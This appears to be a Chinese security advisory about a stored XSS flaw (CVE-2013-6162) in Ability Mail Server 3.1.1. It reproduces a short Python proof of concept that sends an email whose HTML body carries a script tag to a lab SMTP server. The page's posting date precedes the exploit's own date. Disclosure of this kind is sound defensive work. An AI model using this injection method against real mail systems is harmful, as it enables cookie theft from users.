当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Ability Mail Server \'Body\'标签元素HTML注入漏洞

信息来源:David Um      发表日期:2013-02-01 16:53:00

Ability Mail Server是网络邮件服务器软件,支持SMTP、POP3、WebMail等常用功能。

Ability Mail Server 3.1.1及其他客户端版本在处理嵌入了JS的特制电子邮件的实现上存在存储型XSS漏洞,攻击者可利用此漏洞盗取cookie。

 

BUGTRAQ-ID:64391

CVE-ID:2013-6162

受影响系统:

Code-Crafters Ability Mail Server 2013 (3.1.1)

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/env python

 

\'\'\'

Exploit Title: Ability Mail Server 2013 Stored XSS

Date: 12/20/2013

Exploit Author: David Um

Vendor Homepage: http://www.code-crafters.com/

Software Link: http://download.code-crafters.com/ams.exe

Version: 3.1.1

Tested on: Windows Server 2003 SP2

CVE : CVE-2013-6162

Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.

\'\'\'

 

import smtplib

 

email_addr = \'user@hack.local\'

 

email = \'From: %s\\n\' % email_addr

email += \'To: %s\\n\' % email_addr

email += \'Subject: XSS\\n\'

email += \'Content-type: text/html\\n\\n\'

email += \'<script>alert("XSS")</script>\'

s = smtplib.SMTP(\'192.168.58.140\', 25)

 

s.login(email_addr, "user")

s.sendmail(email_addr, email_addr, email)

s.quit()

解决办法:

厂商补丁:

 

Code-Crafters

-------------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.code-crafters.com/